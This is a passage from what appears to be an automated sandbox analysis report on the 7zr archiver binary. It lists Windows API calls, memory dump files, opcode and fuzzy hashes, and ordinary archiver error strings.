                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AddressH_prologHandleModuleProc
                                        • String ID: : $ SP:$Windows
                                        • API String ID: 786088110-3655538264
                                        • Opcode ID: aa443851811e59b0f44d1f643a9a9ca06fe5f5cadaea63eab5234eb49b2eaec5
                                        • Instruction ID: a5719e2babddb32ea0fcab16d66e29ef276d6ab1a0ea709d16f545990972da8c
                                        • Opcode Fuzzy Hash: aa443851811e59b0f44d1f643a9a9ca06fe5f5cadaea63eab5234eb49b2eaec5
                                        • Instruction Fuzzy Hash: 77312B31C0021A9BCF15EBA8C85B9EEBFB5BF9A700F404069F50272191EF755A85CFA1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B06FB
                                        • EnterCriticalSection.KERNEL32(?), ref: 005B070B
                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 005B0786
                                          • Part of subcall function 005B089E: _CxxThrowException.MSVCRT(?,00654A58), ref: 005B08C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionH_prologLeaveThrow
                                        • String ID: v
                                        • API String ID: 4150843469-3261393531
                                        • Opcode ID: 20639840215dd5581c3aed8f5e1bada6cc6a05ba862626e4f664b04bafc6066a
                                        • Instruction ID: 7feac8c6c6292a3c6e604ef04531d0e60d9c3654063aff4aefb9e3ca0f6d82d6
                                        • Opcode Fuzzy Hash: 20639840215dd5581c3aed8f5e1bada6cc6a05ba862626e4f664b04bafc6066a
                                        • Instruction Fuzzy Hash: 472147B5A10605DFCB64DF28C584BAABBF1FF48314F10892EE44A8BA42DB35A915CB40
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,005AA3C1,00000001), ref: 005AA4CD
                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 005AA4DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: RtlGetVersion$ntdll.dll
                                        • API String ID: 1646373207-1489217083
                                        • Opcode ID: 75d4adf1cee4fe5d1151e46df9b510807a0b2e3f2b4588fbc737365e8a00ca2a
                                        • Instruction ID: 857dc68af100085b46bbe7c6eaa1c32c49ad6167179e0d8e5147cd9bcd75573f
                                        • Opcode Fuzzy Hash: 75d4adf1cee4fe5d1151e46df9b510807a0b2e3f2b4588fbc737365e8a00ca2a
                                        • Instruction Fuzzy Hash: B0D0C7713562101AFBB4A6B87C0EFEE1A4D9F56B717064456F800D1141FBD49D8241A1
                                        APIs
                                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 005C0359
                                        • GetLastError.KERNEL32(?,?,00000000,?), ref: 005C0382
                                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 005C03DA
                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 005C03F0
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastSecurity
                                        • String ID:
                                        • API String ID: 555121230-0
                                        • Opcode ID: ee0b4d8a3d4749b5d7e2dcdb17d1d672adf210889f058c84b5d4bef614f17b40
                                        • Instruction ID: eb4dfa423ec53288e072cbfd1fe906c410dd76f7eb083d4eaa014a0e25cac61b
                                        • Opcode Fuzzy Hash: ee0b4d8a3d4749b5d7e2dcdb17d1d672adf210889f058c84b5d4bef614f17b40
                                        • Instruction Fuzzy Hash: F2315874900209EFDB10DFE8C884FAEBBB5FF44704F108959E566A7291D770AE41DBA0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A8300
                                        • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 005A834F
                                        • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 005A837C
                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 005A839B
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                                        • String ID:
                                        • API String ID: 1689166341-0
                                        • Opcode ID: 3703caadd6c589515f003aad634be13d1fbd304901317082283de7af39138800
                                        • Instruction ID: d15d37c4939b3bf27e372815c00653135315724646e4760e4b2f925dd5979d2d
                                        • Opcode Fuzzy Hash: 3703caadd6c589515f003aad634be13d1fbd304901317082283de7af39138800
                                        • Instruction Fuzzy Hash: 1521C5B6900108AFDF119F94DC85AEEBFBAFF9A750F10046EF905A7251CA724E04CA64
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: BlockPackSize$BlockUnpackSize
                                        • API String ID: 3519838083-5494122
                                        • Opcode ID: cbbadecf32d25878c0384d9bd3aa5c1137e0004021e8ee6f33cbcdef69244216
                                        • Instruction ID: 59c2664f4c7abc0813173c59de28c98101621f31894de4e682055b10753c1c56
                                        • Opcode Fuzzy Hash: cbbadecf32d25878c0384d9bd3aa5c1137e0004021e8ee6f33cbcdef69244216
                                        • Instruction Fuzzy Hash: 5551CF75C042C59ECF3E8BA688B1AFDBFA1BF363C0F18845ED2D6570A2D6215988D705
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005AA4F8
                                          • Part of subcall function 005AA384: __EH_prolog.LIBCMT ref: 005AA389
                                          • Part of subcall function 005A9E14: GetSystemInfo.KERNEL32(?), ref: 005A9E36
                                          • Part of subcall function 005A9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 005A9E50
                                          • Part of subcall function 005A9E14: GetProcAddress.KERNEL32(00000000), ref: 005A9E57
                                        • strcmp.MSVCRT ref: 005AA564
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                                        • String ID: -
                                        • API String ID: 2798778560-3695764949
                                        • Opcode ID: e4eb03cd6537e64cff77b50e1ac0ce3643506e11ec6c151313add7a4764c00e4
                                        • Instruction ID: f4b639ea08faf3090c2dcd56161309863264ea66ae89640131940a6531cdaee8
                                        • Opcode Fuzzy Hash: e4eb03cd6537e64cff77b50e1ac0ce3643506e11ec6c151313add7a4764c00e4
                                        • Instruction Fuzzy Hash: 7E315C31D0121A9BCF19FBE4D85A9EDBFB5BF96310F10401AF40172192DF355A45CAA5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 0$x
                                        • API String ID: 3519838083-1948001322
                                        • Opcode ID: 2fc63cfb4c5702a76d291a689bef97c3e04fbfb392bc3e45e13ab49fd376f637
                                        • Instruction ID: e7e8036b5f15d92be83fc8a2e1f44fabaa4a392133edfd99557c2f43c741483a
                                        • Opcode Fuzzy Hash: 2fc63cfb4c5702a76d291a689bef97c3e04fbfb392bc3e45e13ab49fd376f637
                                        • Instruction Fuzzy Hash: C0214F36D0121A9BCF14EFD8D9966EEBBB5FF89304F10016AE80177241DB755E05CBA0
                                        APIs
                                        Strings
                                        • Cannot open encrypted archive. Wrong password?, xrefs: 005D8698
                                        • Cannot open the file as archive, xrefs: 005D86D0
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                                        • API String ID: 1795875747-1623556331
                                        • Opcode ID: 9467b3d8c7bf0c6a1d25ae8fd1552218f4189a3eba6ba0eceb66c2e1116e3959
                                        • Instruction ID: 632bd2001feb0f888cc1187d65a495aeed45e5fd26d5a43d18e5111465f1bf11
                                        • Opcode Fuzzy Hash: 9467b3d8c7bf0c6a1d25ae8fd1552218f4189a3eba6ba0eceb66c2e1116e3959
                                        • Instruction Fuzzy Hash: 3F01A2353042009FC724A768E499A7EBBA7BFC9320F54441BF50287785DF74A801CB15
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00604039
                                          • Part of subcall function 006040BA: __EH_prolog.LIBCMT ref: 006040BF
                                          • Part of subcall function 005E5E2B: __EH_prolog.LIBCMT ref: 005E5E30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: D.e$T.e
                                        • API String ID: 3519838083-862335121
                                        • Opcode ID: 13b7856137174cc8b3044583aea78dd67867b6e9a4ef02493bda5e6316c9622f
                                        • Instruction ID: fe1b2ac6e6ebd57b4344c26aa14f343492040739126378a61be89a4a769c3c99
                                        • Opcode Fuzzy Hash: 13b7856137174cc8b3044583aea78dd67867b6e9a4ef02493bda5e6316c9622f
                                        • Instruction Fuzzy Hash: 9B012CB0A117418FC768DF64C45528ABFF6BF09704F10895ED49A93741EBB0A608CB91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: =
                                        • API String ID: 1795875747-2525689732
                                        • Opcode ID: 8e9084f5f53209aebb03cef65366d371f65ad274a799dbef2702b97802df8914
                                        • Instruction ID: d2da46a231887c522680fb037f544a957778efd0acef3954e48061bc939276d6
                                        • Opcode Fuzzy Hash: 8e9084f5f53209aebb03cef65366d371f65ad274a799dbef2702b97802df8914
                                        • Instruction Fuzzy Hash: 8BE09A7AA001159BCB00ABADAC458BE7F2AFB81714B000823E420CB201EA609921CBD0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$fputc
                                        • String ID: `&f
                                        • API String ID: 1185151155-3499709819
                                        • Opcode ID: 4eef11d4b199c902ee8515b3963f308de80295fb7533d15932e9d27e45df8375
                                        • Instruction ID: 12c88a67c43b9b4c2e58a9d8a287f68906dab0065292133d71a873c2bd601bde
                                        • Opcode Fuzzy Hash: 4eef11d4b199c902ee8515b3963f308de80295fb7533d15932e9d27e45df8375
                                        • Instruction Fuzzy Hash: 0CD02E327021222BCB223BED7C40C5EBF5AFFC5B21306040BF880A7312C661AD509BE0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: Unsupported Windows version$p&f
                                        • API String ID: 1795875747-833034638
                                        • Opcode ID: 7a1b4013419bd6d0e6758f195f33de11333d578e2222251f361e63d31fe9b43b
                                        • Instruction ID: 09676f02803e2a4fbc8970747c1c5f570def50ca7a461f669bf7120d7b936297
                                        • Opcode Fuzzy Hash: 7a1b4013419bd6d0e6758f195f33de11333d578e2222251f361e63d31fe9b43b
                                        • Instruction Fuzzy Hash: 5AD0A937308201EFDB098B88F846BA83BA2E388721F20182BE002CA290D7B660008A00
                                        APIs
                                        • memcmp.MSVCRT(?,006548A0,00000010), ref: 006041D6
                                        • memcmp.MSVCRT(?,00650168,00000010), ref: 006041F1
                                        • memcmp.MSVCRT(?,006501E8,00000010), ref: 00604205
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: d26ed954bc70f89e2da98e7acbf7244c062a02e4fcf4f0c54fc22b75c2374086
                                        • Instruction ID: e30f4f69296c6c183944fa4b4e78538766de7d77e1124f45dc1b6c940a1e319e
                                        • Opcode Fuzzy Hash: d26ed954bc70f89e2da98e7acbf7244c062a02e4fcf4f0c54fc22b75c2374086
                                        • Instruction Fuzzy Hash: 5B01E1B17C020567E7244B118C42FBF73AA9F64761F054428FF459B281FAB4EA408394